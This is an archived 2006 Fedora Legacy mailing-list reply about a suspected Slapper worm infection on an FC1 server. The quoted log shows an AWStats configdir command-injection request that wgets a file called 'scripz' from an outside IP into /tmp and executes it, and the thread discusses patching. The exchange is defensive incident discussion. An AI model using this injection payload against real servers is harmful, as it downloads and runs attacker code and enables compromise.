Google
  Web www.spinics.net

Re: slapper worm

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]


On Monday 23 January 2006 14:32, Michael Mansour wrote:
 
 
>  403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip
>z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1"
>  404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
>
> These "scripz" files end up going into /tmp, being compiled with
> gcc, renamed to "httpd" and run as that.
>
> I'm using:
>
> perl-5.8.3-17.4.legacy
> httpd-2.0.51-1.9.legacy
> openssl-0.9.7a-33.13.legacy
>
> Are there any updates FL can do to any of the packages to
> fix/block slapper from an FC1 machine?
>
> Michael.
>
 

Are you sure it's using an SSL exploit?

http://www.lurhq.com/slapperv2.html

Regards, Mike Klinke

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list

[Fedora Development]     [Fedora Announce]     [Fedora Legacy Announce]     [Fedora Config]     [PAM]     [Fedora General Discussion]     [Big List of Linux Books]     [Gimp]     [Free Internet Dating]     [Yosemite Questions]

Powered by Linux